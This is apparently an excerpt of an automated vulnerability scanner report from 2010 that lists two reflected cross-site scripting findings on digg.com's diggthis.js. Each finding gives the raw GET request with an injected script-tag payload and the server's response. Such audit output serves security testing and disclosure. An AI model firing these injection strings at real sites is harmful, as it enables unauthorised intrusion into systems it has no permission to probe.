1. Cross-site scripting (reflected)
1.1. http://digg.com/tools/diggthis.js [REST URL parameter 1]
1.2. http://digg.com/tools/diggthis.js [REST URL parameter 2]
Severity: | High |
Confidence: | Certain |
Host: | http://digg.com |
Path: | /tools/diggthis.js |
GET /tools%007fc71"><script>alert(1 Accept: */* Referer: http://www.wired.com Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: digg.com Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 20:21:32 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 Cache-Control: no-cache,no-store,must Pragma: no-cache Set-Cookie: traffic_control Set-Cookie: d=cbb3a58acc522768ca X-Digg-Time: D=237512 10.2.128.255 Vary: Accept-Encoding nnCoection: close Content-Type: text/html;charset=UTF-8 Content-Length: 15352 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Digg - error_ - Profile</title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://digg.com |
Path: | /tools/diggthis.js |
GET /tools/diggthis.js%00dc217"><script>alert(1 Accept: */* Referer: http://www.wired.com Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: digg.com Proxy-Connection: Keep-Alive |
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 20:21:34 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 Cache-Control: no-cache,no-store,must Pragma: no-cache Set-Cookie: traffic_control Set-Cookie: d=a4a09480f533f37724 X-Digg-Time: D=465202 10.2.130.26 Vary: Accept-Encoding Cneonction: close Content-Type: text/html;charset=UTF-8 Content-Length: 15351 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Digg - error_ - Profile</title> <meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, ...[SNIP]... <link rel="alternate" type="application/rss+xml ...[SNIP]... |